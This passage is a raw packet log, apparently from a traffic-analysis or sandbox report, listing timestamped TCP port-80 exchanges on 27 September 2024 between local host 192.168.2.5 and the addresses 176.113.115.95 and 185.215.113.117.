                                                                          Sep 27, 2024 04:21:16.885298967 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.885312080 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.885322094 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.885334015 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.885341883 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.885345936 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.885353088 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.885382891 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.885407925 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.893053055 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.893090010 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.893106937 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.893121004 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.893122911 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.893132925 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.893157959 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.893162966 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.893162966 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.893172026 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.893177032 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.893177032 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.893184900 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.893198967 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.893205881 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.893224001 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.894979954 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.895034075 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.895037889 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.895051956 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.895062923 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.895077944 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.895093918 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.895097971 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.895111084 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.895122051 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.895133972 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.895136118 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.895163059 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.895184994 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.899137974 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.899166107 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.899178028 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.899192095 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.899204016 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.899204969 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.899219990 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.899225950 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.899234056 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.899246931 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.899256945 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.899275064 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.899293900 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.899570942 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.899621964 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.899678946 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.899689913 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.899708033 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.899719000 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.899719954 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.899728060 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.899732113 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.899746895 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.899746895 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.899755955 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.899760008 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.899775982 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.899784088 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.899801016 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.900279045 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.900327921 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.900379896 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.900392056 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.900405884 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.900412083 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.900422096 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.900422096 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.900435925 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.900449038 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.900475025 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.901428938 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.901439905 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.901458025 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.901469946 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.901475906 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.901482105 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.901487112 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.901494980 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.901505947 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.901510000 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.901525974 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.901540995 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.901562929 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.901855946 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.901897907 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.901906013 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.901918888 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.901931047 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.901945114 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.901962042 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.901969910 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.902045012 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.902055025 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.902066946 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.902086020 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.902091980 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.902096987 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.902108908 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.902108908 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.902122974 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.902132988 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.902136087 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.902153015 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.902162075 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.902163982 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.902177095 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.902185917 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.902189016 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.902208090 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.902211905 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.902225018 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.902234077 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.902251005 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.902271986 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.902313948 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.902327061 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.902337074 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.902347088 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.902350903 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.902360916 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.902364016 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.902380943 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.902381897 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.902393103 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.902405024 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.902405977 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.902429104 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.902450085 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.902847052 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.902879953 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.902890921 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.902896881 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.902915955 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.902925968 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.902940035 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.902954102 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.902966022 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.902976990 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.902980089 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.902996063 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.903009892 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.903021097 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.903023005 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.903045893 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.903048038 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.903057098 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.903084040 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.903131008 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.903143883 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.903153896 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.903165102 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.903173923 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.903191090 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.903198004 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.903228045 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.914995909 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.915024042 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.915036917 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.915047884 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.915054083 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.915066004 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.915077925 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.915086985 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.915091038 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.915110111 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.915153980 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.928858995 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.928885937 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.928900003 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.928913116 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.928911924 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.928925991 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.928926945 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.928939104 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.928951025 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.928953886 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.928961992 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.928980112 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.928991079 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.928993940 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.929003954 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.929006100 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.929017067 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.929028988 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.929038048 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.929042101 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.929065943 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.929075956 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.929094076 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.929105997 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.929116964 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.929130077 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.929135084 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.929158926 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.929167032 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.929184914 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.929198980 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.929210901 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.929212093 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.929233074 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.929238081 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.929263115 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.929269075 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.929281950 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.929290056 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.929307938 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.929318905 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.929361105 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.929373980 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.929384947 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.929395914 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.929404974 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.929423094 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.929442883 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.929481983 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.929493904 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.929505110 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.929524899 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.929537058 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.940718889 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.940732956 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.940746069 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.940757990 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.940776110 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.940788031 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.940798998 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.940802097 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.940810919 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.940823078 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.940829039 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.940843105 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.940845013 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.940854073 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.940855980 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.940865993 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.940885067 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.940895081 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.940897942 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.940927982 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.940938950 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.940948009 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.940948963 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.940980911 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.940992117 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.942019939 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.942048073 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.942059040 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.942075968 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.942078114 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.942090988 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.942090988 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.942105055 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.942127943 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.942154884 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.942189932 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.942202091 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.942213058 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.942229033 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.942255020 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.942320108 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.942332983 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.942344904 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.942354918 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.942367077 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.942389965 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.942425013 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.942425966 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.942439079 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.942450047 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.942461014 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.942465067 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.942472935 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.942491055 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.942514896 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.942521095 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.942533970 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.942545891 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.942558050 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.942580938 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.943166971 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.943176985 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.943186998 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.943192005 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.943212986 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.943221092 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.943223953 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.943237066 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.943248987 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.943259954 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.943281889 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.943304062 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.943317890 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.943329096 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.943341017 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.943341970 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.943356037 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.943382025 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.943412066 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.943424940 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.943437099 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.943447113 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.943464994 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.943480968 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.943491936 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.943494081 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.943506956 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.943517923 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.943543911 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.943577051 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.943588018 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.943598986 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.943613052 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.943636894 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.943650007 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.943656921 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.943662882 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.943691015 CEST4972480192.168.2.5176.113.115.95
